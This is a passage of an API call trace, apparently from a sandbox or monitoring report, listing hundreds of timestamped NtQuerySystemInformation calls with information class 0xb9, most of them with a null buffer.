SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x38, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x40, ResultLength=0x0) [0192.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0192.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0193.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 